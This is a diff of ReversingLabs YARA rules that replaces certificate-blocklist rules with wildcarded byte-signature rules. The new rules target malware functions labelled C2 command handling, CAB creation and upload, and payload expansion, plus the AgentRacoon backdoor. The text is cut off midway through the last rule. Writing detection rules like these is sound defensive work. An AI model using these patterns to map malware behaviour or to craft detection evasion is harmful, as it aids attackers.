-rule REVERSINGLABS_Cert_Blocklist_094Bf19D509D3074913995160B195B6C : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing malware."
-		author = "ReversingLabs"
-		id = "8241e2c6-e4e7-581c-b759-6314d2e28a4d"
-		date = "2023-11-08"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L441-L457"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "3c1ed012716f36876d9375838befb9821b87cafc6aca57a0f18392f80f5ba325"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$network_communication_p1 = {
+            55 8B EC 83 EC ?? 53 56 8B 35 ?? ?? ?? ?? 57 33 FF 68 ?? ?? ?? ?? 8D 9E ?? ?? ?? ??
+            57 53 89 7D ?? 89 7D ?? 89 7D ?? 89 7D ?? 89 7D ?? 89 5D ?? E8 ?? ?? ?? ?? 8B 45 ??
+            50 56 8D 8E ?? ?? ?? ?? 51 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 83 C4 ??
+            81 C6 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 57 57 57 6A ?? 57 FF 15 ?? ?? ?? ?? 8B D8 3B DF
+            0F 84 ?? ?? ?? ?? 57 57 6A ?? 57 57 6A ?? 56 53 C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ??
+            ?? 8B F8 89 7D ?? 85 FF 75 ?? 53 FF 15 ?? ?? ?? ?? 8D 47 ?? 5F 5E 5B 8B E5 5D C2 ??
+            ?? 8B 55 ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 52 68 ?? ?? ?? ?? 57 C7 45 ?? ??
+            ?? ?? ?? FF 15 ?? ?? ?? ?? 8B F0 85 F6 75 ?? 8B 35 ?? ?? ?? ?? 57 FF D6 53 FF D6 5F
+            5E B8 ?? ?? ?? ?? 5B 8B E5 5D C2 ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 56 FF 15 ?? ?? ?? ??
+            6A ?? 6A ?? 85 C0 74 ?? 8D 45 ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 50 50 6A ?? 56
+            FF 15 ?? ?? ?? ?? 56 8B 35 ?? ?? ?? ?? FF D6 57 FF D6 53 FF D6 5F 5E B8 ?? ?? ?? ??
+            5B 8B E5 5D C2 ?? ?? 8B 45 ?? 85 C0 75 ?? 50 50 50 56 FF 15 ?? ?? ?? ?? 56 8B 35 ??
+            ?? ?? ?? FF D6 57 FF D6 53 FF D6 5F 5E 83 C8 ?? 5B 8B E5 5D C2 ?? ?? 40 50 6A ?? 89
+        }
+		$network_communication_p2 = {
+            45 ?? FF 15 ?? ?? ?? ?? 8B F8 85 FF 75 ?? 50 50 50 56 FF 15 ?? ?? ?? ?? 56 8B 35 ??
+            ?? ?? ?? FF D6 8B 4D ?? 51 FF D6 53 FF D6 5F 5E 83 C8 ?? 5B 8B E5 5D C2 ?? ?? 8B 55
+            ?? 52 6A ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ??
+            ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 89 45 ?? 83 F8 ?? 75 ?? 6A ?? 6A ?? 6A ??
+            56 FF 15 ?? ?? ?? ?? 56 8B 35 ?? ?? ?? ?? FF D6 8B 45 ?? 50 FF D6 53 FF D6 5F 5E 83
+            C8 ?? 5B 8B E5 5D C2 ?? ?? 8B 55 ?? 8D 4D ?? 51 52 57 56 FF 15 ?? ?? ?? ?? 85 C0 74
+            ?? 83 7D ?? ?? 74 ?? 68 ?? ?? ?? ?? 57 C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ??
+            85 C0 B8 ?? ?? ?? ?? 75 ?? 8B 45 ?? 89 45 ?? 83 F8 ?? 74 ?? 8B 4D ?? 8B 55 ?? 6A ??
+            8D 45 ?? 50 51 57 52 FF 15 ?? ?? ?? ?? 8B 4D ?? 8B 45 ?? 01 45 ?? 51 6A ?? 57 E8 ??
+            ?? ?? ?? 8B 45 ?? 83 C4 ?? 8D 55 ?? 52 50 57 56 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 8B 4D
+            ?? 51 FF 15 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 56 FF 15 ?? ?? ?? ??
+            56 8B 35 ?? ?? ?? ?? FF D6 8B 55 ?? 52 FF D6 53 FF D6 83 7D ?? ?? 0F 84 ?? ?? ?? ??
+            8B 45 ?? 5F 5E 5B 8B E5 5D C2
+        }
+		$handle_c2_commands_p1 = {
+            55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 56 57 8D 85 ?? ?? ?? ??
+            50 33 FF 68 ?? ?? ?? ?? 89 BD ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B F0 89 B5 ?? ?? ?? ??
+            3B F7 75 ?? 83 C8 ?? 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 8B 0D ?? ??
+            ?? ?? 8B 16 51 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B
+            4E ?? 50 51 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8B 56 ?? 68 ?? ?? ?? ?? 52 E8 ?? ??
+            ?? ?? 83 C4 ?? 85 C0 75 ?? 8B 4E ?? 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 8B
+            5E ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 33 C0 57 51 66 89 85 ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 83 C4 ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 8B 46 ?? 52 50 E8 ?? ??
+            ?? ?? 83 C4 ?? 85 C0 75 ?? 8B 4E ?? 57 51 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ??
+            ?? ?? FF 15 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 8B 46 ?? 52 50 E8 ?? ?? ??
+            ?? 83 C4 ?? 85 C0 75 ?? 8B 46 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 69 C0 ?? ?? ?? ?? A3 ??
+            ?? ?? ?? E9 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 8B 56 ?? 51 52 E8 ?? ?? ?? ?? 83 C4 ?? 85
+        }
+		$handle_c2_commands_p2 = {
+            C0 75 ?? 8B 46 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 69 C0 ?? ?? ?? ?? A3 ?? ?? ?? ?? E9 ??
+            ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 4C 86 ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? BE
+            ?? ?? ?? ?? 85 C0 75 ?? 8D 78 ?? E8 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? E9 ?? ?? ?? ?? 33
+            FF E8 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 8B 06 52 50 E8
+            ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B
+            44 96 ?? 51 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 8B 8D ?? ?? ?? ?? 8B 54 8E ?? 68
+            ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 8B 06 8D 50 ?? 8B FF 66 8B 08 83
+            C0 ?? 66 3B CF 75 ?? 2B C2 D1 F8 57 8D 3C 45 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? EB
+            ?? 8B 06 8D 50 ?? 66 8B 08 83 C0 ?? 66 3B CF 75 ?? 2B C2 D1 F8 6A ?? 8D 3C 45 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? EB ?? A1 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 54 8E ?? 50
+            52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8D 48 ?? EB ?? 33 C9 E8 ?? ?? ?? ?? 8B F8 56
+            FF 15 ?? ?? ?? ?? 8B 4D ?? 8B C7 5F 5E 33 CD 5B E8 ?? ?? ?? ?? 8B E5 5D C3
+        }
+		$create_cab_file_and_upload_p1 = {
+            55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? A1 ?? ?? ?? ?? 53 56 57 33
+            FF 68 ?? ?? ?? ?? 8B F1 8D 95 ?? ?? ?? ?? 33 C9 57 52 89 85 ?? ?? ?? ?? 89 BD ?? ??
+            ?? ?? 89 BD ?? ?? ?? ?? 89 BD ?? ?? ?? ?? 89 BD ?? ?? ?? ?? 66 89 8D ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 33 C0 57 51 66 89 85 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 33 C0 89 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 66 89
+            85 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 33 D2 50 66 89 95 ?? ?? ?? ?? FF 15 ?? ??
+            ?? ?? 0F B7 8D ?? ?? ?? ?? 0F B7 95 ?? ?? ?? ?? 0F B7 85 ?? ?? ?? ?? 51 0F B7 8D ??
+            ?? ?? ?? 52 0F B7 95 ?? ?? ?? ?? 50 51 52 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ??
+            ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 57
+            51 E8 ?? ?? ?? ?? 83 C4 ?? 8D 95 ?? ?? ?? ?? 52 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8D
+            85 ?? ?? ?? ?? 50 57 68 ?? ?? ?? ?? 8B C8 51 FF 15 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52
+            FF 15 ?? ?? ?? ?? 6A ?? 56 E8 ?? ?? ?? ?? 8B D8 68 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 83
+            C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ??
+            68 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 68 ?? ?? ?? ?? 53 E8 ?? ?? ??
+            ?? 83 C4 ?? 85 C0 74 ?? 68 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 68 ??
+            ?? ?? ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 8B CE 8D BD ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 83 F8 ?? 75 ?? 83 C8 ?? 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 57 8D
+        }
+		$create_cab_file_and_upload_p2 = {
+            85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? EB ?? 33 FF 8D 9D ?? ?? ?? ?? 8D 85 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 3B C7 74 ?? 8D 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ??
+            ?? 8B B5 ?? ?? ?? ?? 83 C6 ?? 56 6A ?? FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 3B C7 74
+            ?? 56 57 50 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D8 83 C4 ?? 3B
+            DF 74 ?? 8D 85 ?? ?? ?? ?? 8D 50 ?? EB ?? 8D 9B ?? ?? ?? ?? 66 8B 08 83 C0 ?? 66 3B
+            CF 75 ?? 2B C2 8D 93 ?? ?? ?? ?? D1 F8 8D 0C 00 33 C0 89 02 89 42 ?? 89 42 ?? 89 42
+            ?? 89 42 ?? 89 42 ?? 89 42 ?? 89 42 ?? 3B CF 74 ?? 51 8D 8D ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 83 C4 ?? 8B CB EB ?? 33 C9 8B 95 ?? ?? ?? ?? 89 8A ?? ?? ?? ?? 3B CF 0F 84 ?? ??
+            ?? ?? 8B 85 ?? ?? ?? ?? 8B BD ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? 56 50 E8 ?? ?? ?? ?? 8B
+            BD ?? ?? ?? ?? 8B 87 ?? ?? ?? ?? 85 C0 74 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 53 C7 87 ??
+            ?? ?? ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8D 50 ?? 8D 9B ?? ?? ?? ??
+            66 8B 08 83 C0 ?? 66 85 C9 75 ?? 2B C2 D1 F8 8D 84 46 ?? ?? ?? ?? 50 6A ?? 89 85 ??
+            ?? ?? ?? FF 15 ?? ?? ?? ?? 8B D8 85 DB 0F 84 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 51 6A ??
+            53 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 C4 ?? 8D 95 ?? ?? ?? ?? 52 68 ?? ?? ?? ?? 50
+            53 E8 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 56 89 85 ?? ?? ?? ?? 51 03 C3 50 E8 ?? ?? ?? ??
+            8B BD ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 03 FB 83 C4 ?? 03 FE B9 ?? ?? ?? ?? BE ?? ?? ??
+            ?? 50 F3 A5 FF 15 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 81 C6 ?? ?? ?? ?? 56 E8
+        }
+		$create_cab_file_and_upload_p3 = {
+            6A ?? 6A ?? 6A ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 8B F8 85 FF 0F 84 ?? ?? ?? ?? 6A ??
+            6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 56 57 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ??
+            89 85 ?? ?? ?? ?? 85 C0 75 ?? 57 FF 15 ?? ?? ?? ?? B8 ?? ?? ?? ?? 5F 5E 5B 8B 4D ??
+            33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 8B B5 ?? ?? ?? ?? 68 ?? ?? ?? ?? 81 C6 ?? ?? ?? ??
+            6A ?? 56 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 C4 ?? 50 05 ?? ?? ?? ?? 50 68 ?? ?? ??
+            ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 83 C4 ?? 6A ?? 68 ?? ?? ?? ??
+            6A ?? 6A ?? 6A ?? 56 68 ?? ?? ?? ?? 51 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? FF 15 ?? ?? ??
+            ?? 8B F0 85 F6 75 ?? 8B 95 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 52 FF D6 57 FF D6 B8 ?? ??
+            ?? ?? 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 8B 85 ?? ?? ?? ?? 50 53 6A
+            ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 50 50 50 56 FF 15 ?? ?? ?? ?? 56
+            8B 35 ?? ?? ?? ?? FF D6 8B 8D ?? ?? ?? ?? 51 FF D6 57 FF D6 B8 ?? ?? ?? ?? 5F 5E 5B
+            8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 53 FF 15 ?? ?? ?? ?? 6A ?? 6A ?? 8D 95 ??
+            ?? ?? ?? 52 56 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 50 50 50 56 FF 15 ?? ?? ?? ?? 56 8B 35
+            ?? ?? ?? ?? FF D6 8B 85 ?? ?? ?? ?? 50 FF D6 57 FF D6 B8 ?? ?? ?? ?? 5F 5E 5B 8B 4D
+            ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 8B 85 ?? ?? ?? ?? 85 C0 75 ?? 50 50 50 56 FF 15
+            ?? ?? ?? ?? 56 8B 35 ?? ?? ?? ?? FF D6 8B 8D ?? ?? ?? ?? 51 FF D6 57 FF D6 83 C8
+        }
+		$create_cab_file_and_upload_p4 = {
+            5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 40 50 6A ?? 89 85 ?? ?? ?? ?? FF
+            15 ?? ?? ?? ?? 8B D8 85 DB 75 ?? 50 50 50 56 FF 15 ?? ?? ?? ?? 56 8B 35 ?? ?? ?? ??
+            FF D6 8B 95 ?? ?? ?? ?? 52 FF D6 57 FF D6 83 C8 ?? 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ??
+            ?? ?? 8B E5 5D C3 8B 85 ?? ?? ?? ?? 50 6A ?? 53 E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 83
+            C4 ?? 8D 8D ?? ?? ?? ?? 51 52 53 56 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 68 ?? ?? ?? ?? 53
+            E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 89 85 ?? ?? ?? ?? EB ?? C7 85 ?? ?? ?? ?? ?? ??
+            ?? ?? 53 FF 15 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 56 FF 15 ?? ?? ?? ?? 56 8B 35 ?? ?? ??
+            ?? FF D6 8B 85 ?? ?? ?? ?? 50 FF D6 57 FF D6 8B 4D ?? 8B 85 ?? ?? ?? ?? 5F 5E 33 CD
+            5B E8 ?? ?? ?? ?? 8B E5 5D C3
+        }
+		$cmd_expand_payload = {
+            55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 56 57 68 ?? ?? ?? ?? 8B
+            D9 33 FF 8D 8D ?? ?? ?? ?? 33 C0 57 51 66 89 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ??
+            ?? ?? 8D 85 ?? ?? ?? ?? 33 D2 57 50 66 89 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 8D 8D
+            ?? ?? ?? ?? 57 51 89 BD ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 57 68 ?? ?? ?? ?? 6A ??
+            57 6A ?? 33 C0 68 ?? ?? ?? ?? 53 89 BD ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 85 ?? ?? ??
+            ?? 89 85 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B F0 83 FE ?? 74 ?? 57 57 57 6A ?? 57 56 FF
+            15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 3B C7 75 ?? 56 FF 15 ?? ?? ?? ?? 83 C8 ?? 5F 5E 5B
+            8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 57 57 57 6A ?? 50 FF 15 ?? ?? ?? ?? 8B F8
+            85 FF 74 ?? 68 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 6A ?? 8D 47 ?? 50 6A ?? 6A ?? FF 15
+            ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ??
+            ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 68 ?? ?? ?? ?? 68 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 8B 57 ?? 83 C4 ?? 57 89 95 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 85 ??
+            ?? ?? ?? 8B 3D ?? ?? ?? ?? 50 FF D7 56 FF D7 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 6A ??
+            51 E8 ?? ?? ?? ?? 53 68 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ??
+            ?? 83 C4 ?? 33 C0 8D 8D ?? ?? ?? ?? 51 8D 95 ?? ?? ?? ?? 52 50 50 68 ?? ?? ?? ?? 50
+            50 50 66 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 6A ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ??
+            FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 68 ?? ?? ?? ?? FF D3 6A
+            ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ??
+            8B F0 83 FE ?? 75 ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 75 ?? 56 FF D7 8B 4D ?? 8B 85 ?? ??
+            ?? ?? 5F 5E 33 CD 5B E8 ?? ?? ?? ?? 8B E5 5D C3
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Porral Twinware S.L.L." and pe.signatures [ i ] . serial == "09:4b:f1:9d:50:9d:30:74:91:39:95:16:0b:19:5b:6c" and 1373241599 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( all of ( $network_communication_p* ) ) and ( all of ( $handle_c2_commands_p* ) ) and ( all of ( $create_cab_file_and_upload_p* ) ) and ( $cmd_expand_payload )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_0A77Cf3Ba49B64E6Cbe5Fb4A6A6Aacc6 : INFO FILE
+rule REVERSINGLABS_Bytecode_MSIL_Backdoor_Agentracoon : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects AgentRacoon backdoor."
 		author = "ReversingLabs"
-		id = "4fb06917-ccbd-514c-a936-e337c31c6e65"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "ad74d530-ffbd-589f-b941-3a5d9ec737b6"
+		date = "2023-12-15"
+		modified = "2023-12-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L459-L475"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "3bebc4a36b57526505167d8f075d468e4775d66c81ce08644c506d9be94efba0"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/backdoor/ByteCode.MSIL.Backdoor.AgentRacoon.yara#L1-L128"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "3ba73f19f59c2e5880df820c52f16997047d7299eb14d421ae2ed8f3790bcfe9"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Backdoor"
+		tc_detection_name = "AgentRacoon"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "I.ST.SAN. Srl" and pe.signatures [ i ] . serial == "0a:77:cf:3b:a4:9b:64:e6:cb:e5:fb:4a:6a:6a:ac:c6" and 1371081599 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_1F4C22Da1107D20C1Eda04569D58E573 : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing malware."
-		author = "ReversingLabs"
-		id = "4ff75d18-926e-51aa-8e1c-b9699669bbd0"
-		date = "2023-11-08"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L477-L493"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "fe19c4b21c3b70ec571461ca6d9c370a971c01f2d68e3c3916aa1fa0f13b20f8"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$unpack_response_p1 = {
+            17 8D ?? ?? ?? ?? 13 ?? 11 ?? 16 03 18 91 9C 11 ?? 73 ?? ?? ?? ?? 0A 06 16 6F ?? ??
+            ?? ?? 2D ?? 73 ?? ?? ?? ?? 7A 17 8D ?? ?? ?? ?? 13 ?? 11 ?? 16 03 19 91 9C 11 ?? 73
+            ?? ?? ?? ?? 0A 06 1A 6F ?? ?? ?? ?? 2C ?? 06 1B 6F ?? ?? ?? ?? 2C ?? 06 1C 6F ?? ??
+            ?? ?? 2C ?? 06 1D 6F ?? ?? ?? ?? 2C ?? 73 ?? ?? ?? ?? 7A 1F ?? 0B 2B ?? 07 17 58 0B
+            03 07 91 2D ?? 07 17 58 0B 03 8E 69 07 59 0C 08 8D ?? ?? ?? ?? 0D 03 07 09 16 08 28
+            ?? ?? ?? ?? 1A 13 ?? 2B ?? 11 ?? 17 58 13 ?? 09 11 ?? 91 2D ?? 11 ?? 17 58 13 ?? 09
+            8E 69 11 ?? 59 0C 08 8D ?? ?? ?? ?? 13 ?? 09 11 ?? 11 ?? 16 08 28 ?? ?? ?? ?? 02 12
+            ?? FE 15 ?? ?? ?? ?? 12 ?? 18 8D ?? ?? ?? ?? 7D ?? ?? ?? ?? 12 ?? 18 8D ?? ?? ?? ??
+            7D ?? ?? ?? ?? 12 ?? 18 8D ?? ?? ?? ?? 7D ?? ?? ?? ?? 12 ?? 18 8D ?? ?? ?? ?? 7D ??
+            ?? ?? ?? 12 ?? 18 8D ?? ?? ?? ?? 7D ?? ?? ?? ?? 12 ?? 18 8D ?? ?? ?? ?? 7D ?? ?? ??
+            ?? 12 ?? 07 1F ?? 59 8D ?? ?? ?? ?? 7D ?? ?? ?? ?? 12 ?? 18 8D ?? ?? ?? ?? 7D ?? ??
+            ?? ?? 12 ?? 18 8D ?? ?? ?? ?? 7D ?? ?? ?? ?? 12 ?? 11 ?? 1A 59 8D ?? ?? ?? ?? 7D ??
+            ?? ?? ?? 12 ?? 18 8D ?? ?? ?? ?? 7D ?? ?? ?? ?? 12 ?? 18 8D ?? ?? ?? ?? 7D ?? ?? ??
+            ?? 12 ?? 1A 8D ?? ?? ?? ?? 7D ?? ?? ?? ?? 12 ?? 18 8D ?? ?? ?? ?? 7D ?? ?? ?? ?? 11
+            ?? 7D ?? ?? ?? ?? 03 16 02 7C ?? ?? ?? ?? 7B ?? ?? ?? ?? 16 18 28 ?? ?? ?? ?? 03 18
+        }
+		$unpack_response_p2 = {
+            02 7C ?? ?? ?? ?? 7B ?? ?? ?? ?? 16 18 28 ?? ?? ?? ?? 03 1A 02 7C ?? ?? ?? ?? 7B ??
+            ?? ?? ?? 16 18 28 ?? ?? ?? ?? 03 1C 02 7C ?? ?? ?? ?? 7B ?? ?? ?? ?? 16 18 28 ?? ??
+            ?? ?? 03 1E 02 7C ?? ?? ?? ?? 7B ?? ?? ?? ?? 16 18 28 ?? ?? ?? ?? 03 1F ?? 02 7C ??
+            ?? ?? ?? 7B ?? ?? ?? ?? 16 18 28 ?? ?? ?? ?? 03 1F ?? 02 7C ?? ?? ?? ?? 7B ?? ?? ??
+            ?? 16 07 1F ?? 59 28 ?? ?? ?? ?? 09 16 02 7C ?? ?? ?? ?? 7B ?? ?? ?? ?? 16 18 28 ??
+            ?? ?? ?? 09 18 02 7C ?? ?? ?? ?? 7B ?? ?? ?? ?? 16 18 28 ?? ?? ?? ?? 09 1A 02 7C ??
+            ?? ?? ?? 7B ?? ?? ?? ?? 16 11 ?? 1A 59 28 ?? ?? ?? ?? 11 ?? 16 02 7C ?? ?? ?? ?? 7B
+            ?? ?? ?? ?? 16 18 28 ?? ?? ?? ?? 11 ?? 18 02 7C ?? ?? ?? ?? 7B ?? ?? ?? ?? 16 18 28
+            ?? ?? ?? ?? 11 ?? 1A 02 7C ?? ?? ?? ?? 7B ?? ?? ?? ?? 16 1A 28 ?? ?? ?? ?? 11 ?? 1E
+            02 7C ?? ?? ?? ?? 7B ?? ?? ?? ?? 16 18 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 2C ?? 02 7C ??
